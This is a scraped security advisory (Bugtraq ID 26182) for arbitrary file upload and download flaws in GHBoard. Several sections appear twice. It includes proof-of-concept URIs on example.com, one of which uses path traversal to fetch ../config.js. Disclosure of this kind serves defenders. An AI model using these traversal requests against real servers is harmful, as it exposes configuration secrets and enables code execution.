GHBoard Multiple Arbitrary File Access Vulnerabilities
BID:26182
Info
GHBoard Multiple Arbitrary File Access Vulnerabilities
| Bugtraq ID: | 26182 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-5737 CVE-2007-5738 CVE-2007-5739 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 23 2007 12:00AM |
| Updated: | Nov 15 2007 12:39AM |
| Credit: | Xcross87 is credited with the discovery of this vulnerability. |
| Vulnerable: |
GHLab GHBoard 0 |
| Not Vulnerable: | |
Discussion
GHBoard Multiple Arbitrary File Access Vulnerabilities
GHBoard is prone to multiple vulnerabilities that let attackers upload and download arbitrary files and execute arbitrary code within the context of the webserver process.
GHBoard is prone to multiple vulnerabilities that let attackers upload and download arbitrary files and execute arbitrary code within the context of the webserver process.
Exploit / POC
GHBoard Multiple Arbitrary File Access Vulnerabilities
The following proof-of-concept URIs are available:
http://www.example.com/ghboard/component/flashupload/download.jsp?name=[file_name]
http://www.example.com/ghboard/component/flashupload/download.jsp?name=../config.js
http://www.example.com/ghboard/component/flashupload/data/upload_filename.xxx
The following proof-of-concept URIs are available:
http://www.example.com/ghboard/component/flashupload/download.jsp?name=[file_name]
http://www.example.com/ghboard/component/flashupload/download.jsp?name=../config.js
http://www.example.com/ghboard/component/flashupload/data/upload_filename.xxx
Solution / Fix
GHBoard Multiple Arbitrary File Access Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
References
GHBoard Multiple Arbitrary File Access Vulnerabilities
References:
References: